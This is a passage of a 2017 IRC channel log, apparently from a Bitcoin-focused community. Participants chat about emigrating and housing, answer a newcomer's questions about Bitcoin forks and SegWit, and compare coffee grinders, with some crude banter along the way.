photo equip, etc ) also , but really belongs at junkyard 1734849;1510189082;asciilifeform;at any rate, l1 folx firmly stuck in usa ( who... ben_vulpes ? mod6 ? ) invited to inquire re particulars. 1734850;1510189161;asciilifeform;kudos to phf for finding a fella who needed a lispm. 1734851;1510189234;*;asciilifeform bbl, meat 1734852;1510190570;mircea_popescu;asciilifeform maybe run a giveaway on your blog. 1734853;1510190715;mircea_popescu;alternatively, simply buy them passage in a container. though that more reasonable when going to kekistans, i guess 1734854;1510191014;asciilifeform;i dun have any desire to give away to non-l1 1734855;1510191027;asciilifeform;may as well sell for fiatola, or leave for the vultures. 1734856;1510191058;asciilifeform;i'ma make a container, but prolly not 2 and defo not 3 1734857;1510191070;asciilifeform;most of my earthly goodz dun merit the cost. 1734858;1510191209;asciilifeform;( ftr it ain't as if asciilifeform had a thing to move into yet. but may as well get all of the parallelizable balls rolling. ) 1734859;1510191547;ben_vulpes;congrats on the new project 1734860;1510191623;ben_vulpes;i'm currently reevaluating my own exit timeline; project tinyhuman did not go particularly well this time through 1734861;1510192130;asciilifeform;failed checksum ? 1734862;1510192421;ben_vulpes;in broad strokes, yeah 1734863;1510192583;asciilifeform;if it ain't a seekrit, to where does ben_vulpes want to move ? 1734864;1510192756;ben_vulpes;somewhere i can launch autonomous subs under cover of learning to surf 1734865;1510192833;ben_vulpes;bits of rural costa rica look nice, was briefly looking at chile before i realized i'd probably end up at the same miserable latitude 1734866;1510192859;asciilifeform;same as where 1734867;1510192871;ben_vulpes;~portland area. 45 1734868;1510192888;asciilifeform;not same microclimate 1734869;1510192895;asciilifeform;recall argentinistan 1734870;1510192911;ben_vulpes;this is possible! but i would muchly like to trade number of hours in longest summer day for...more summer days. 1734871;1510192932;asciilifeform;or for that matter , timis is same parallel as odessa but warmer, because in a 'kettle' 1734872;1510192948;ben_vulpes;arstan had thicker rain than portland, but i heard that it was not the soul-killing constant grey fog. 1734873;1510192956;asciilifeform;( figs did not grow in o ) 1734874;1510193093;ben_vulpes;oh also chilean ocean is fucking cold, forgot that criteria 1734875;1510193104;asciilifeform;your subs need warm ?! 1734876;1510193153;ben_vulpes;i've lived near cold bodies of water my whole life, have no insulation, and i would like to get in warm water on a whim 1734877;1510193169;asciilifeform;it's called bathtub, lel 1734878;1510193211;asciilifeform;i dun think i ever saw warm water outdoors. 1734879;1510193214;ben_vulpes;asciilifeform must have mondo bathtub with wavegenerator 1734880;1510193254;ben_vulpes;asciilifeform: where i'm from there's a layer of maybe 6 inches of warm water in the summer 1734881;1510193259;ben_vulpes;i hear this layer is deeper elsewhere 1734882;1510193303;asciilifeform;prolly yer path lies to the tropics, then, to mircea_popescu landia. 1734883;1510193321;ben_vulpes;you don't say 1734884;1510193356;asciilifeform;either that, or grow yer skin fat, like the finns 1734885;1510193362;ben_vulpes;!!reputation whaack 1734886;1510193364;deedbot;http://p.bvulpes.com/pastes/Pu6KK/?raw=true 1734887;1510193369;asciilifeform;then all water will seem warm. 1734888;1510193731;ben_vulpes;you know i have objected to skinny dipping more and more of late on the grounds that i will get cold and grumpy within five minutes so why don't you just strip and get in and i'll make a fire up here and catcall 1734889;1510193765;mircea_popescu;ben_vulpes coastal cr is hot and humid though. 1734890;1510193775;mircea_popescu;mountain cr kicks ass but obviously no subs there 1734891;1510193784;mircea_popescu;then again whole country can be walked across. 1734892;1510193836;ben_vulpes;i mean i'll drive a bit 1734893;1510193866;ben_vulpes;great excuse to buy mega truck in saturated american market of mildly depreciated truck 1734894;1510193879;mircea_popescu;personally went across the whole thing in a day. quite doable. especially if going at night. locals are pretty nuts with the timings, crowd within the same hours, are apparently petrified of driving at night 1734895;1510193883;asciilifeform;oblig mountain sub >> http://btcbase.org/log/2015-11-21#1329005 1734896;1510193883;a111;Logged on 2015-11-21 05:29 asciilifeform: http://log.bitcoin-assets.com/?date=21-11-2015#1328928 << 'Подводная лодка В степях Украины Погибла в неравном Воздушном бою!' (tm) (r) 1734897;1510193887;mircea_popescu;then again understandable, very inept drivers. 1734898;1510193899;trinque;girl and I are looking seriously at singapore 1734899;1510193914;*;mircea_popescu is curious how that goes. 1734900;1510193928;trinque;but I also have an accountant with thai wife, citizenship 1734901;1510193948;trinque;guy might be able to help there 1734902;1510193957;mircea_popescu;nice. 1734903;1510193965;mircea_popescu;thai seems to be favoured destination 1734904;1510193968;asciilifeform;lotta ru folx in thailandistan 1734905;1510194030;mircea_popescu;other than that, cr oceans are indeed warm. 1734906;1510194033;asciilifeform;if you have stomach for life in 'rice kingdoms', it is mega-destination. 1734907;1510194052;mircea_popescu;asciilifeform by that logic costa rica is oil-fried flour-kingdom. 1734908;1510194107;asciilifeform;see china thread. white man phood scarce in we-dun-lactase land. 1734909;1510194130;asciilifeform;relatively. 1734910;1510194247;*;asciilifeform not yet been in person there, cannot speak to the practical acuteness of said problem. 1734911;1510194329;asciilifeform;but i'd be genuinely surprised to learn that there are, say, multitude of quality icecream vendors, in thailand. 1734912;1510194351;mircea_popescu;why ? 1734913;1510194373;asciilifeform;asians ? lactose-indigesting folx ? 1734914;1510194429;trinque;diameter of accountant suggests he's finding something to get fat on over there 1734915;1510194443;asciilifeform;that's doable anywhere. 1734916;1510194470;ben_vulpes;lol diameter of accountant 1734917;1510194544;asciilifeform;iirc thailand bans all land ownership by noncitizens. but this is prolly finessable mircea_popescutronically. 1734918;1510194585;asciilifeform;have you been there yet, ben_vulpes ? 1734919;1510194600;asciilifeform;or trinque 1734920;1510194622;trinque;haven't, but it's on the list 1734921;1510194627;ben_vulpes;nah not i 1734922;1510194636;asciilifeform;will be interesting to read . 1734923;1510194636;ben_vulpes;dunno why land ownership is such an important 1734924;1510194646;trinque;as far as land ownership, not too sure how much I want to marry a piece of real estate anyway. 1734925;1510194714;asciilifeform;you don't lease the chair you sit in, neh 1734926;1510194731;asciilifeform;but not 'married' it either 1734927;1510194802;ben_vulpes;chair not really burdened with pretentions of asset classhood 1734928;1510194819;asciilifeform;neither is a toyota's worth of orcland 1734929;1510194884;asciilifeform;but granted 'tco' optimization is a very personal thing 1734930;1510194946;ben_vulpes;lol mhm, just this month i had the gutters cleaned, various blinds replaced, wiring performed and all at zero cost to self 1734931;1510194968;*;ben_vulpes would rather make terrible noises on the guitar than gentoo fucking houses 1734932;1510194994;asciilifeform;unlikely to get this level of service from orc landlord, unless you're mircea_popescu 1734933;1510195024;asciilifeform;( and even him i seem to recall cursing the air conditioner people in b-a ) 1734934;1510195080;ben_vulpes;pay commensurately less, get commensurately less. 1734935;1510195102;asciilifeform;and imho a house you haven't usefully 'gentooed' is merely... a hotel. may as well live in actual hotel 1734936;1510195157;asciilifeform;orc landlord aint building optic cablimg, 1734937;1510195166;asciilifeform;antennae, cemented safes, etc. 1734938;1510195183;ben_vulpes;orc landlord also ain't gonna object to actual improvements. 1734939;1510195190;trinque;it's the kind of work that stays behind, too 1734940;1510195201;asciilifeform;no moar then my current one objects, lol 1734941;1510195207;ben_vulpes;fwiw this house came complete with cat5 in every room 1734942;1510195208;asciilifeform;but he gets to eat'em. 1734943;1510195208;trinque;oughta do it somewhere you can see yourself staying, or do without. or so the logic goes 1734944;1510195250;trinque;my ancestors chose the states rashly in the 40s, look where that got them 1734945;1510195301;asciilifeform;where would you rather they had gone in 40s , lol 1734946;1510195354;asciilifeform;instead of the only industrial empire not wrecked by the war. 1734947;1510195432;trinque;went from wealthy italian folks doing italian things to more or less "people of walmart" in 2 generations. lack of options doesn't excuse that. 1734948;1510195472;asciilifeform;not so much doing-of-italianthings happening back in okd italy any moar, neh 1734949;1510195480;asciilifeform;*old 1734950;1510195504;trinque;still, came to america, the air dissolved their wot, wot died 1734951;1510195543;asciilifeform;how did 'air dissolvd their wot' ? plenty of italians famiusly preserved their wot in usa 1734952;1510195563;trinque;for how long? 1734953;1510195563;asciilifeform;or you mean in present day. 1734954;1510195585;trinque;they had a great time in prohibition; where are they now? 1734955;1510195597;trinque;tell you where, shitty real estate in florida with hair on their backs 1734956;1510195614;trinque;owning franchises and shit 1734957;1510195640;asciilifeform;i can think of worse things to be in usa 1734958;1510195688;asciilifeform;e.g. owning 0 1734959;1510195713;asciilifeform;and in the swamp. 1734960;1510195758;ben_vulpes;salarymen and art critics 1734961;1510195796;asciilifeform;'there's plenty of room at the bottom' (tm)(r)(feynman) 1734962;1510196172;mircea_popescu;http://btcbase.org/log/2017-11-09#1734932 << landlady at one place bought me proper showerheads on her own initiative during her own trip to teh civilised world. 1734963;1510196172;a111;Logged on 2017-11-09 02:36 asciilifeform: unlikely to get this level of service from orc landlord, unless you're mircea_popescu 1734964;1510196183;mircea_popescu;i say tis all in teh relationships. otherwise, ownership is illusory. 1734965;1510196209;mircea_popescu;http://btcbase.org/log/2017-11-09#1734936 << you'd be surprised. 1734966;1510196209;a111;Logged on 2017-11-09 02:39 asciilifeform: orc landlord aint building optic cablimg, 1734967;1510196216;asciilifeform;revisiting upstack, the other side of http://btcbase.org/log/2017-11-09#1734943 medal -- asciilifeform's ancestors, had fruit trees. but asciilifeform does not get to have fruit trees, and it makes him slightly sadder. 1734968;1510196216;a111;Logged on 2017-11-09 02:40 trinque: oughta do it somewhere you can see yourself staying, or do without. or so the logic goes 1734969;1510196262;mircea_popescu;http://btcbase.org/log/2017-11-09#1734945 << not terrible choice in the 40s, the damage roosevelt was doing was neither obvious nor its staying power clear. 1734970;1510196262;a111;Logged on 2017-11-09 02:41 asciilifeform: where would you rather they had gone in 40s , lol 1734971;1510196738;asciilifeform;40s usa was afaik by very long shot the best looking horse in the glue factory. 1734972;1510198092;BingoBoingo; bits of rural costa rica look nice, was briefly looking at chile before i realized i'd probably end up at the same miserable latitude << The problem with Chile is poor internet transit capacity. 1734973;1510198234;BingoBoingo; neither is a toyota's worth of orcland << Toyota's worth of orland in Thailand will lack any centrality 1734974;1510202877;mircea_popescu;aaand in other "united states government what ? who are these schmucks nobody heard of ?" https://www.sec.gov/litigation/investreport/34-81207.pdf 1734975;1510203224;asciilifeform;'The Commission has determined not to pursue an enforcement action in this matter based on the conduct and activities known to the Commission at this time' << lol! 1734976;1510203248;mircea_popescu;in other lulz, the lulzy tim swanson has a blog, on which he uses trilema notes, and derps insistently. i'm taking a bet nobody ever heard of it. 1734977;1510203271;asciilifeform;whossat 1734978;1510203301;mircea_popescu;http://btcbase.org/log/2014-08-12#792148 1734979;1510203301;a111;Logged on 2014-08-12 02:19 TimSwanson: Because that's how normal debates work 1734980;1510203328;mircea_popescu;rando aspie. 1734981;1510203396;asciilifeform;snoar 1734982;1510203425;*;asciilifeform back to bed 1734983;1510203430;mircea_popescu;nn 1734984;1510203651;mircea_popescu;anyway. mildly amusing that in 2017 rando still don quixoting with the same windmills as in 2014. who knows, maybe if he wastes his ENTIRE life at this, "how he thinks normal debates work" will matter. 1734985;1510203682;mircea_popescu;anything but suck the cock of your betters, it is teh modernity after all, french revolution relevant 4evar!!1 1734986;1510203897;mircea_popescu;and in other "god fucking damn it", i used coffee grinder to grind down some clavo de olor, which was so fucking juicy and fresh it ACTUALLY DISSOLVED the god damned plastic. 1734987;1510203914;mircea_popescu;ruined coffee grinder i had to import all the way from switzerland. 1734988;1510204688;BingoBoingo;lol @ USG says WAT 1734989;1510204704;BingoBoingo;cry @ poor grinder, hardly knewer 1734990;1510205644;BingoBoingo;Lafond on StreetPreets http://www.jameslafond.com/article.php?id=9462 1734991;1510221763;davout;http://btcbase.org/log/2017-11-09#1734898 <<< housing looks like a nightmare there 1734992;1510221763;a111;Logged on 2017-11-09 02:18 trinque: girl and I are looking seriously at singapore 1734993;1510234872;shinohai;This whole US/Cuba row over the "sonic wavez" thing gets more ridiculous by the day: http://archive.is/Xhr6w 1734994;1510237091;mircea_popescu;!!up concernedscaling 1734995;1510237091;deedbot;concernedscaling voiced for 30 minutes. 1734996;1510237103;mircea_popescu;shinohai did it come alive at night and fuck their wife ? 1734997;1510237136;shinohai;Likely, so "we gotta make sure and ban you 'muricans from these 80 hotels, just to be sure" 1734998;1510237139;shinohai;poppycock 1734999;1510237362;mircea_popescu;sooo obama lifted all-cuba ban, to be enforced instead on a hotel-by-hotel basis ? 1735000;1510237380;mircea_popescu;i can almost see the local charge d'affaires, "if you don't get taller hookers ima have your hotel del ray added to index!" 1735001;1510237571;concernedscaling;Hi everyone. I'm trying to make sense of all this scale talk and I want to keep my BTC safe. My first mistake is probably getting information from twitter and redditard. We have Dr Craig W going on (and quite convincing) about BCash being the real bitcoin as it is able to scale like satoshis vision. However, this makes no sense to me considerin 1735002;1510237571;concernedscaling;g it was a fork (it's like Litecoin in my mind, which "scales" as well). But even more concerning is Bitcoin with segwit, and my current BTC on this upgraded protocol. I have not seen much talk about these issues in here lately, is there a reason for this? It seems like most are underestimating the threat of this fake bcash and segwit. 1735003;1510237614;mircea_popescu;maybe http://btcbase.org/log/2017-11-08#1734288 1735004;1510237614;a111;Logged on 2017-11-08 17:30 davout: so apparently the segwit2x derps finally yielded https://lists.linuxfoundation.org/pipermail/bitcoin-segwit2x/2017-November/000685.html 1735005;1510237958;davout;concernedscaling: i don't think there's much to be said about this whole "issue" that wasn't said in 2014/2015 1735006;1510238001;mircea_popescu;the stubborn insistence of the "reading public" to read old newspapers is very much the chief ideological point of the journalist "profession", as it keeps them in print. 1735007;1510238009;mircea_popescu;to not read* 1735008;1510238067;concernedscaling;Thanks. I guess I am just trying to make sense of all of this, and couldnt find it in the logs. Instead of bcash forking from bitcoin, what was stopping them from just mining and rejecting segwit transactions on the the real BTC? 1735009;1510238072;concernedscaling;doesn't this make way more sense? 1735010;1510238087;mircea_popescu;concernedscaling do you know what happens when you divide by 0 ? 1735011;1510238164;concernedscaling;tsunamis 1735012;1510238180;mircea_popescu;hm. problem might have been larger than originally thought. 1735013;1510238252;concernedscaling;I mean, it is undefined 1735014;1510238267;concernedscaling;Why is this relevant? 1735015;1510238273;mircea_popescu;right. so this is also the problem here : you keep trying to make sense of the situation left after a division by 0. 1735016;1510238298;mircea_popescu;you see some labels, and take out your chinese set, and lay out the pawns, these red ones to label1, these blue ones to label2 etcetera 1735017;1510238322;mircea_popescu;this is not the real situation. bitcoin exists. "bitcoin cahs" DOES NOT EXIST. the various people that talk about things similarily do not exist. 1735018;1510238358;concernedscaling;Ok, does Segwit exist? 1735019;1510238409;mircea_popescu;you're probably too young to remember max keiser, and his amusing "expertises" in bitcoin years ago ; nevertheless a good helping of http://trilema.com/2017/cezar-petrescu-file-dintrun-caiet-de-amintiri-mateiu-i-caragiale/#footnote_25_75738 woul;d probably help. 1735020;1510238415;mircea_popescu;concernedscaling it does not. 1735021;1510238415;concernedscaling;At what point can the real bitcoin continue to mutate until something bad happens 1735022;1510238428;mircea_popescu;mutate ? 1735023;1510238445;concernedscaling;Segwit is on the real bitcoin, no? 1735024;1510238458;concernedscaling;seems like a mutation is occurring 1735025;1510238470;mircea_popescu;you ever seen one of those old toyota trucks people deleted bits off so they read YO ? 1735026;1510238494;mircea_popescu;has toyota "mutated" or wtf is the argument here. aftermarket modifications are marginal by their fucking definition. the people involved wouldn't be involved otherwise. 1735027;1510238553;mircea_popescu;conceivably someone somewhere modified his bitcoin client to read "Hakked by CooLbOy" and recompiled. this is mutation now ? 1735028;1510238671;concernedscaling;haha, I see. I do remember max keiser, and I see him still very involved in the bitcoin scene to this day 1735029;1510238686;mircea_popescu;yes, in the strictest of senses, the obscure masturbatory activities of desocialized youths "exist". but they do not socially exist, and for a very good reason : they're asocial to begin with. 1735030;1510238689;concernedscaling;He even resorts to scam pumping of dash 1735031;1510238710;mircea_popescu;there's more scene than there's audience chairs, see. 1735032;1510238742;mircea_popescu;old will was right, "the world's a stage". what he omitted to point out is that the hall only goes a yard whereas the stage goes on for miles. out of the building, and into the mists. 1735033;1510238979;shinohai;!!up concernedscaling 1735034;1510238979;deedbot;concernedscaling voiced for 30 minutes. 1735035;1510239041;davout;concernedscaling: relevant -> https://pbs.twimg.com/media/CxzssDcUAAAP2PF.jpg 1735036;1510239047;concernedscaling;Thanks, I will try and not get caught up in the shit that doesnt really matter 1735037;1510239070;shinohai;lol davout .... saved! 1735038;1510239090;mircea_popescu;lol notbad. who's the author ? 1735039;1510239122;davout;nfi 1735040;1510239208;concernedscaling;if that is his twitter handle, his name is Ben Halpern 1735041;1510239228;concernedscaling;Creator/founder/webmaster of https://dev.to (@ThePracticalDev). Mount Allison grad, coder, buddhist, feminist, Batman. 1735042;1510239242;mircea_popescu;concernedscaling so invite him over. 1735043;1510239281;mircea_popescu;what's this, like another digg/reddit ? 1735044;1510239295;concernedscaling;twitter? yeah something like that 1735045;1510239353;mircea_popescu;concernedscaling why not make yourself a pgp key and reg with deedbot at that ? 1735046;1510239404;concernedscaling;a cesspool of ideas and spam, just a tool for controlling people. The fighting about core vs bcash vs seg2x vs miners vs blahblah is entertaining. Sad that I need to take part to see how the market reacts 1735047;1510239426;mircea_popescu;why specifically do you care ? 1735048;1510239531;concernedscaling;I don't want to underestimate the dumb money being thrown around. I dont want all of these idiot users to crash my BTC holdings because some fake satoshi is spewing political nonsense on redditard/twitter to control people. 1735049;1510239552;mircea_popescu;throwing money around rarely crashes anything. 1735050;1510239578;shinohai;concernedscaling: Have you read http://trilema.com/2015/if-you-go-on-a-bitcoin-fork-irrespective-which-scammer-proposes-it-you-will-lose-your-bitcoins/ ? 1735051;1510239583;shinohai;Still relevant 1735052;1510239585;mircea_popescu;we are talking of fiatola here, after all. 1735053;1510239631;concernedscaling;Yes, I have read that a few times 1735054;1510239683;concernedscaling;"Moreover, my budget to sink this scam exceeds the budget of everyone involved on the supporting side" 1735055;1510239708;concernedscaling;can you sink it already? 1735056;1510239714;mircea_popescu;there have been a lot of these pies in the sky to be concerned about to date, huh. 1735057;1510239735;mircea_popescu;concernedscaling for my curiosity, if you were to calculate the total hours you spent with " I need to take part to see how the market reacts" to date, what'd it come to ? 1735058;1510239738;concernedscaling;yeah, can't sink them all as they will just keep coming 1735059;1510239844;concernedscaling;You know, it's actually pretty strange. I just buy and hold, but given the substantial amount of money, I rely on being current with the bullshit going on, because I chose to not underestimate the power of the idiots and how much harm it can do 1735060;1510239846;davout;"sinking fake bitcoins" actually yields *more* bitcoins to further sink other fake bitcoins 1735061;1510239857;concernedscaling;But, I don't even trade 1735062;1510239864;mircea_popescu;ok, but put out a figure. how many man hours does the concern take a year ? 1735063;1510239895;concernedscaling;maybe ~730 hours 1735064;1510239922;mircea_popescu;so since 2014 let's say, since you recall keyser, we could say you spent about 2k hours, or a full year's workhours, on this. 1735065;1510239932;mircea_popescu;how many hours did you spend building a bitcoin something ? 1735066;1510239947;concernedscaling;0 1735067;1510239950;mircea_popescu;like, a logotron is maybe a day's work to stand up and then maybe a hour monthly to maintain and such. 1735068;1510239960;mircea_popescu;concernedscaling well... i'd say you have good cause to be concerned then. 1735069;1510239982;mircea_popescu;why not split work and axiety more evenly ? 100% to anxiety seems a poor strategy. 1735070;1510240071;concernedscaling;That is probably a very good idea 1735071;1510240083;mircea_popescu;you're welcome. 1735072;1510240184;shinohai;Navigating to http://thebitcoin.foundation/trb-howto.html and building that would be a far, far better use of one's time as well. 1735073;1510240203;shinohai;!!up Guest44578 1735074;1510240203;deedbot;Guest44578 voiced for 30 minutes. 1735075;1510240328;concernedscaling;Thanks, havent seen this idiot proof how to guide 1735076;1510240334;concernedscaling;will try and get TRB node going later 1735077;1510240392;shinohai;If you need any help or get stuck, ping me or sing out here in chan. Someone will be happy to assist. 1735078;1510240416;concernedscaling;will try and get a key going too 1735079;1510240438;concernedscaling;If it so profitable to kill scams, why do so many exist? 1735080;1510242422;asciilifeform;http://btcbase.org/log/2017-11-09#1735055 << this was the umpteenth 'i am beset with ants! and i heard you have an anteater here' wasnnit. 1735081;1510242422;a111;Logged on 2017-11-09 15:01 concernedscaling: can you sink it already? 1735082;1510242478;asciilifeform;'why dontcha stop sitting on anthill' 'wat' 'aha, get off the anthill' 'that's not possible, everywhere is anthill' etc 1735083;1510242552;shinohai;But how else will I know what the ants are doing? 1735084;1510243373;mircea_popescu;concernedscaling the generator is ambitious idiots. they don't "feel" their current social station is befitting for one such as them ; but they ALSO don't "feel" like they should have to do what has to be done. 1735085;1510243398;mircea_popescu;from this search of "the easier way" by people stupid enough to not be able to distinguish the workable from the unworkable, the scam ever emerges. 1735086;1510243436;mircea_popescu;in any population the majority will be insufficient, and therefore readily converge towards somesuch nonsense. 1735087;1510243456;mircea_popescu;so basically speaking, for as long as the women will keep getting pregnant the schoolteachers will still have work to do. 1735088;1510244070;asciilifeform;http://btcbase.org/log/2017-11-09#1734987 << swiss plastic rubbish aint what it used to be, eh 1735089;1510244070;a111;Logged on 2017-11-09 05:05 mircea_popescu: ruined coffee grinder i had to import all the way from switzerland. 1735090;1510244092;mircea_popescu;every plastic will be solluble in something 1735091;1510244096;mircea_popescu;it's the definition of plastic. 1735092;1510244144;asciilifeform;what's teflon soluble in ? 1735093;1510244191;mircea_popescu;i dunno, dmf ? 1735094;1510244200;asciilifeform;afaik at stp in nuffin 1735095;1510244231;mircea_popescu;i suppose. so how does it polymerizwe then ? 1735096;1510244258;asciilifeform;iirc heat/pressure. 1735097;1510244259;mircea_popescu;o wow look at that, it's actually done ~in emulsion~. i had nfi. 1735098;1510244285;mircea_popescu;i'll stand by it : this then means that teflon is only marginally at best a plastic. 1735099;1510244301;asciilifeform;it's a fluoroplastic ( the su unbranding of it, naturally ) 1735100;1510244319;mircea_popescu;apparently it can be formulated so as to dissolve in dmf/dma etc 1735101;1510244346;asciilifeform;there are other fluoroplastics , that are easier to work / other desirable parameters tweaked 1735102;1510244417;mircea_popescu;not sure i want teflonated coffee grinder tbh. 1735103;1510244441;mircea_popescu;now, it';d be nice if you could buy BRONZE interior. not fucking electrolysed, but SOLID. nevertheless, it is apparently usg-forbidden to use actual materials. 1735104;1510244463;asciilifeform;why not teflon ? your grinder goes over 260C ? 1735105;1510244466;mircea_popescu;let the dumps contain 1000 plastic re-instantiations of the same god damned object, what if i could afford to pay 3x the price and leave it to my grandkids. 1735106;1510244479;mircea_popescu;asciilifeform locally, i expect it does. high speed granules etc. 1735107;1510244483;asciilifeform;possib 1735108;1510244505;mircea_popescu;wtf is wrong with a chunk of fucking bronze, 100 grams or so, for the inner housing. 1735109;1510244507;asciilifeform;bronze has one possible headache : very often has pb added ( for machineability ) 1735110;1510244519;mircea_popescu;so make special kitchen alloy. 1735111;1510244533;asciilifeform;oh hey didn't mircea_popescu at one time have a bronze mortar ? 1735112;1510244537;mircea_popescu;reason i even know "cuisinart" is that they used to make metal tools. except stopped. 1735113;1510244545;mircea_popescu;asciilifeform i also have marble ones. 1735114;1510244556;mircea_popescu;and granite and etc. 1735115;1510244562;asciilifeform;so can haz kitchen bronze, then. 1735116;1510244583;asciilifeform;surgical steel would also work 1735117;1510244595;mircea_popescu;it's what they used to do. 1735118;1510244646;asciilifeform;incidentally why ground the thing in coffee grinder, vs blender ( with the glass bulb ) ? 1735119;1510244671;asciilifeform;needs fine powder ? 1735120;1510244678;mircea_popescu;was the idea. 1735121;1510244693;mircea_popescu;needs fine powder and too juicy to grind well in mortar so give it a shot. 1735122;1510244704;asciilifeform;prolly would work if you dessicated it 1st 1735123;1510244732;asciilifeform;( or is the juice necessary ) 1735124;1510244738;shinohai;I have one of these, best one I have ever bought: https://www.amazon.com/dp/B01A6CP1HI/ref=sspa_dk_detail_2?psc=1 1735125;1510244739;mircea_popescu;yes, but general solution for this (salt) not usable. and i don't eat enough sugar for that alternative + i don't eat the white hygroscopic kind 1735126;1510244757;asciilifeform;not salt 1735127;1510244760;asciilifeform;vacuum dessicator. 1735128;1510244781;mircea_popescu;so wait, i got really good clovges and ima put them into a "make-them-like-the-walmart-ones" tool ? 1735129;1510244807;mircea_popescu;shinohai nice, steel and ceramic. 1735130;1510244824;shinohai;Yeah, 0 plastic parts. Had the thing like 5 years now 1735131;1510244834;asciilifeform;oh hm if need to pulverize with juice still in, can try freezing 1735132;1510244844;asciilifeform;this was described in the altschuller b00k 1735133;1510244845;mircea_popescu;pretty cool. and evidently making it right doesn't make it more expensive, 25 bux is what all cost. 1735134;1510244870;mircea_popescu;asciilifeform didn't think of it. actually, had 0 expectation i'd end up with a dissolved-and-recombined surface of the inside of the thing, from smooth to matte. 1735135;1510244899;asciilifeform;shinohai: they had exactly like this grinder in the timis 'museum of communist konsoomer' 1735136;1510244931;mircea_popescu;the sadness of "modern technology" is that it fails miserably at things that aren't THAT technologically advanced. 1735137;1510244950;mircea_popescu;takes a lot of effort to reproduce today the kitchen of 1880 middle class polish housewife. 1735138;1510244970;asciilifeform;the 1880s housewife didn't insist on existing in 1e9 copies. 1735139;1510244995;mircea_popescu;her husband did. 1735140;1510245001;shinohai;asciilifeform: perfect for that bourgeois blend 1735141;1510245001;mircea_popescu;what good catholic didn't have a dozen kids then. 1735142;1510245015;asciilifeform;they also had proper wars. 1735143;1510245038;mircea_popescu;notrly the poles. more like proper reamings. 1735144;1510245066;asciilifeform;fact being, the tub had a drain then. today, faucet still runs, but no drain. 1735145;1510245094;mircea_popescu;the tub has no drain an' erryone looks pretty drained. 1735146;1510245154;asciilifeform;( phunphakt : in plebeland usa, it is not wholly unheard of for folx to live for weeks or months in a house without working drains. shit in buckets, dishes turn green, etc ) 1735147;1510245212;mircea_popescu;the joys of overcrowding. 1735148;1510245214;ben_vulpes;i've been using https://www.amazon.com/bodum-antigua-electric-grinder-black/dp/b000vm08uo for at least a decade now 1735149;1510245235;asciilifeform;the joys of 'spend every penny you make, and owe maxint' 1735150;1510245261;mircea_popescu;that's the counter-counter of http://btcbase.org/log/2017-11-07#1733641 : it is impossible to clog drain here. 1735151;1510245261;a111;Logged on 2017-11-07 20:08 asciilifeform: it has up side, and down ( e.g. http://btcbase.org/log/2017-08-30#1706555 ) 1735152;1510245292;asciilifeform;lolwhy, the drain is a hole in the galleon's captain's cabin, hangs over the sea ? 1735153;1510245294;mircea_popescu;ben_vulpes is that polycarbonate ? 1735154;1510245331;mircea_popescu;asciilifeform drain does 100m drop over a mile, calculate the force a column of water puts upon it, obtain higher value than kitchen garbage disposal unit applies 1735155;1510245331;asciilifeform;ben_vulpes: that looks like a starbuckstron. which i always suspected has a part in explaining why their swill tastes like burned plastic 1735156;1510245349;asciilifeform;mircea_popescu: most clogs happen metre or two from the arse 1735157;1510245360;mircea_popescu;not the kind that turn dishes green, i'd have imagined ? 1735158;1510245362;ben_vulpes;mircea_popescu: housing, yeah 1735159;1510245364;mircea_popescu;if this is true, why not just fix 1735160;1510245378;asciilifeform;mircea_popescu: because unless you know how with own hands, 'fix' is 500-800bux 1735161;1510245391;mircea_popescu;so buy a snake, big whoop. 20 bux at BingoBoingo 's store. 1735162;1510245397;asciilifeform;ikr ? 1735163;1510245413;asciilifeform;but you also gotta be able and willing to lift the throne ( old houses in usa have no cleanplug ) etc. 1735164;1510245452;ben_vulpes;asciilifeform: the burrs are steel in mine 1735165;1510245491;asciilifeform;ben_vulpes: mircea_popescu earlier suggested , 'boltzmann distrib' of coffee speck velocities, almost certainly has high end that grinds pieces of your vessel into the output 1735166;1510245501;mircea_popescu;https://www.amazon.com/Hamilton-Beach-Fresh-Grind-Coffee-Grinder/dp/B005EPRFKO << the dead item, since we're doing this. 1735167;1510245519;mircea_popescu;of course, inexplicably it's all written in french, "pour usage domestique" etc. 1735168;1510245520;asciilifeform;ahahahahahaha i have that one 1735169;1510245531;mircea_popescu;scams everywhere! "made in chine" 1735170;1510245536;asciilifeform;but i haven't tried grinding wet ginsung or whatnot 1735171;1510245541;ben_vulpes;ah well yeah, especially the bladed models are going to produce lots of high velocity particles 1735172;1510245573;ben_vulpes;a burr grinder has nested conical grinding faces; spacing between which controls ground finenes 1735173;1510245593;ben_vulpes;also, blade pulverizes, burr shears. better extraction with the latter method. 1735174;1510245599;ben_vulpes;also vastly lower velocity. 1735175;1510245613;asciilifeform;why not take to logical conclusion, and use millstones 1735176;1510245619;mircea_popescu;asciilifeform actually "short" snake is flexible enough to go through toilet water trap deliberately for this reason. 1735177;1510245637;ben_vulpes;why, when the burr grinder is an excellent solution 1735178;1510245658;mircea_popescu;he has a point, i hadn't thought of that. exactly like pepper mill, have two cones in each other, adjustable distance. 1735179;1510245660;asciilifeform;mircea_popescu: i have that type of snake. 1735180;1510245666;ben_vulpes;also burr grinder does not cook the coffee while grinding it, ever notice how the bladed model leaves the grounds...warm? 1735181;1510245668;asciilifeform;it's a good first-line. 1735182;1510245679;mircea_popescu;ben_vulpes yep, yours is teh correct solution. 1735183;1510245704;asciilifeform;not really physically possible to grind without heating 1735184;1510245721;ben_vulpes;not really possible to exist without producing waste heat either 1735185;1510245722;mircea_popescu;but it is possible to use a cone plane instead of a 1dimensional blade 1735186;1510245728;asciilifeform;tru 1735187;1510245742;mircea_popescu;ima get a cone grinder. nfi why i don't have one. 1735188;1510245754;ben_vulpes;but what, give up, sacrifice all efficiency because there's always more gas down the road? 1735189;1510245765;mircea_popescu;in retrospect seems a lot like not having a knife, "cutting bread on this veg peeler is so hard" 1735190;1510245775;ben_vulpes;or maybe just maybe have a care for the final product and take minimal steps to minimize pre-cooking out of volatiles 1735191;1510245804;asciilifeform;oh hm these look interesting, ben_vulpes , sorta like jet compressor 1735192;1510245809;mircea_popescu;precisely. 1735193;1510245822;asciilifeform;high-tech. 1735194;1510245839;mircea_popescu;no dude, "having gone to school" tech as opposed to "i heard on youtube" tech 1735195;1510245874;asciilifeform;i mean, the thing looks multiaxis-machined 1735196;1510245880;mircea_popescu;ah 1735197;1510245882;ben_vulpes;"i don't know much, but i paid attention in materials and machine design while everyone else was browsing facebook and copying homework out of the solution guide" 1735198;1510245882;asciilifeform;kommunist konsoomer did not have'em. 1735199;1510245908;mircea_popescu;communist consumer might have not been the end-all be-all, i find myself sometimes 